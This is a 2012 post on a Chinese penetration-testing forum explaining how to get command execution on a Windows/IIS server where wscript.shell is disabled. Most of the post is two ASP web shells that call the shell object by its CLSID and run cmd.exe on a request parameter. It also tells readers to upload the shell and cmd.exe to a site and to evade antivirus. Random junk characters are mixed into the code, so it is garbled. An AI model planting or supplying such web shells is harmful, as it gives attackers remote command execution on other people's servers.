找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3085|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    % Q0 V5 G- C! B% B. G; ~  E
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。* |, Q5 F& v1 O( M( P
  • 要想让运行命令可以试试这种方法,成功率为五五之数。! ^0 j. d. K: W! u8 }/ f
  • 把下面代码复制:8 U6 O0 Z3 [$ B8 i
  • <%
    * s0 v6 C- W) \# i( L* r: H* Y
  • end if) G  `4 }7 F1 x3 J6 f& N7 m1 a+ B
  • response.write(”")' X0 f+ O+ ?; h3 o) _/ ]
  • On Error Resume
    1 w" d. N9 T1 F- E
  • Next% D4 |: V  D# `8 N
  • response.write oScriptlhn.exec(”cmd.exe /c” & ( x% ~* I1 o2 v! D  n) |/ a
  • request(”c”)).stdout.readall9 J+ D0 h# ]- w: G! k
  • response.write(”")* F  c8 d) O3 U" N* G) y
  • response.write(”")
    + p6 v3 j" f4 |3 C9 B4 [! T
  • response.write(”
    # d1 Y. ?- S3 m  F2 X4 Z
  • “)
    $ L7 z$ r( \8 C
  • response.write(”")% r: G( C6 @7 c: t3 K' _8 ]4 Y0 R
  • %>
    ; \- B5 z; L2 f1 X
  • 保存为一个asp文件,然后传到网站目录上去
    * k( ^/ z# l5 s0 a# w3 n
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    ( I! A1 G9 m  G3 u+ D% z8 O. |
  • 我用此成功运行过cacls命令。7 `' g) O) K; F5 ?; C+ Q4 P
  • 第二那就是运行时出错,可能限制某些代码执行+ v5 E. d6 ^. Y2 U$ ^+ x! D$ e
  • 无wscript.shell组件提权又一个方法
    - ~. e' o+ a& T9 \, y" K, G+ h
  • <object runat=server id=oScriptlhn scope=page % q1 m9 Z8 l3 ^3 b0 [3 u
  • . u  o. A  ]( N3 |
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>& B" G/ G; o" |5 J% {2 K
  • <%if err then%> ( l9 y% f! P' `* {, w4 ~
  • <object runat=server id=oScriptlhn scope=page
    , ~' D8 I; F$ L, w$ k! d; z, M
  • 3 R! e4 v9 l: Q6 O
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    # R- Q1 I9 J1 m  z$ q' W1 Y
  • <%
    - q5 Y  L4 u- }+ |6 a7 A
  • end if . i6 H6 V, H3 ~" w
  • response.write(”<textarea readonly cols=80 3 F, ]$ M6 O$ `+ j& |4 c2 Q

  • 0 {, \% ~# x! x" N3 _0 t; b
  • rows=20>”)
    , K6 h: O' |1 U) V; R& k
  • On Error Resume Next
    4 C& C( j* x- P
  • response.write , W% Z; f$ |! \. \* a) d; F; P3 N
  • . e+ s7 R4 z; E( V8 [5 s- A$ x6 f
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall! r; m6 l4 X$ V5 Z$ l5 O3 K) o
  • response.write(”</textarea>”) . ]* \8 N5 s/ M5 `9 X- Y
  • response.write(”<form ( \, c2 C& \& o( W8 C
  • 7 s# r$ S' j# `* x
  • method=’post’>”)
      Q! Y: z5 N0 c
  • response.write(”<input type=text name=’c'
    9 t& G& Z. G; \% t/ u

  • . H9 T/ f) x. s7 c! V# A9 q3 A) `
  • size=60><br>”)
    7 ~7 r- C1 {( b  ?/ x' s7 D
  • response.write(”<input type=submit
    5 x* W- \3 x7 v" D
  • 1 l# O: E+ F9 \* j) g
  • value=’执行’></form>”)
    9 g- _# Q8 r$ C/ [3 S0 m" u
  • %>2 ]# I0 F7 W1 [: A! [5 e
  • 保存为ASP,此代码可能被杀,请注意免杀。
    ( @' y% R" d& z* C6 W
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    : {% C+ y( x( y
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表